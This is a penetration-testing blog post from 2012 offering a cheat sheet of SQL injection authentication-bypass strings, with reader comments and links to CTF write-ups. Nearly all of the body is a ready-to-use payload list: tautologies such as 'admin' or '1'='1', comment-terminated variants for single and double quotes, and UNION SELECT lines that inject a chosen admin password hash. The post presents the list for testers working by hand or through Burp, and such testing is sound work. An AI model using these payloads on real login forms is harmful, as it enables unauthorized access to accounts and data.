Skip to content

Penetration Testing Lab

Offensive Techniques & Methodologies

Methodologies

Resources

Contact

Posted on December 24, 2012

SQL Injection Authentication Bypass Cheat Sheet

by Administrator.In General Lab Notes.18 Comments on SQL Injection Authentication Bypass
Cheat Sheet

This list can be used by penetration testers when testing for SQL injection authentication bypass.A
penetration tester can use it manually or through burp in order to automate the process.The creator
of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please
feel free to leave a comment in order to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Rate this:

45 Votes

Share this:

Twitter
Facebook
LinkedIn
Reddit
Tumblr
Skype
WhatsApp
Telegram
Pinterest
Pocket
Email

Related

SQL Injection Authentication Bypass With BurpFebruary 25, 2013In "Web Application"

Automated Source Code ReviewNovember 27, 2012In "General Lab Notes"

Creating Wordlists With CrunchJuly 12, 2012In "Tools"

Authentication BypassOWASPpenetration testSQL Injection

18 Comments

Yaopointcom says:

December 27, 2012 at 2:22 pm

Thanks a lot mate for the hard work .

Reply

Ialle Ironbits (@Iall3) says:

January 6, 2013 at 8:48 pm

great jobs, thanks you !!!

Reply

Mr Bou3o says:

January 9, 2013 at 4:16 pm

Hello, thank you netbiosX

 Could you tell me what’s the difference between all these ways ?

if there is a break in the website or application, somme ways could success and others
not ??!!

Thank you.

Reply
Pingback: Authentication Bypass | Official @bugcrowd BlogOfficial @bugcrowd Blog

Ashutosh Yadav says:

October 18, 2013 at 6:40 am

great job

Reply
Pingback: PicoCTF 2013 – Injection | dook's Blog

ehtesham says:

November 7, 2016 at 7:28 am

how to use ??

Reply
Pingback: HackDay CTF 2016 (Albania) – N13manT

Pingback: Root-me – Web-Server : “SQL injection – authentication” – Sam's Security Blog

aranisec says:

September 8, 2017 at 4:48 am

Nice list thanks for sharing

Reply

Sathish says:

November 25, 2017 at 12:58 pm

Super

Reply

northamlab says:

May 2, 2018 at 7:08 am

 Great post! Thanks for the post.Keep sharing.

Reply
Pingback: Magento SQL Injection. How to Secure your Magento Store against SQLi

Pingback: OWASP Mutillidae II SQLi | Igor Garofano blog

Pingback: OSCP prep – MYSTIKO

Deniz Ciftci says:

March 15, 2020 at 7:19 pm

Great Post!

Reply
Pingback: Pwning OWASP’s Juice Shop Pt. 5: Login Admin | Curiosity Kills Colby

Pingback: Hunting for bugs methodology @Jawad Mahdi – Welcome Hackers!

Leave a Reply

Top of Form

Bottom of Form

Post navigation
Previous Previous post: File Upload Exploitation

Next Next post: Local File Inclusion Exploitation With Burp

Search Topic
Top of Form

Bottom of Form

Follow PenTest Lab

Top of Form

Enter your email address to follow this blog and receive notifications of new posts by email.

Email Address:

Bottom of Form

Join 2,472 other followers

Recent Posts

Unconstrained Delegation
Persistence – Notepad++ Plugins

Shadow Credentials

Domain Escalation – Machine Accounts

Domain Persistence – Machine Account

Categories
Coding (10)

Exploitation Techniques (19)

External Submissions (3)

General Lab Notes (22)

Information Gathering (12)

Infrastructure (2)

Maintaining Access (4)

Mobile Pentesting (7)

Network Mapping (1)

Post Exploitation (13)

Red Team (116)

Credential Access (3)

Defense Evasion (22)

Domain Escalation (5)

Domain Persistence (4)

Lateral Movement (2)

Man-in-the-middle (1)

Persistence (28)

Privilege Escalation (17)

Reviews (1)

Social Engineering (11)

Tools (7)

VoIP (4)

Web Application (14)

Wireless (2)
@ Twitter

@424f424f @_wald0 @kfosaaen @xorrior @mcohmi @PyroTek3 @mariussmellum @BaileyBercik

@JefTek In that event I will re… twitter.com/i/web/status/1… 12 hours ago

@HuskyHacksMK I had written an article last year. I haven't use Certipy to be fair but a combination
of other tools… twitter.com/i/web/status/1… 13 hours ago

@jorgeorchilles Expect a follow! 13 hours ago

Just in case your are in Mastodon you can still find me here --> infosec.exchange/@netbiosX
1 day ago

Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
github.com/trustedsec/orp… 1 day ago

Pentest Laboratories Discord

Discord

Pen Test Lab Stats

6,551,012 hits

Facebook Page
Blog at WordPress.com.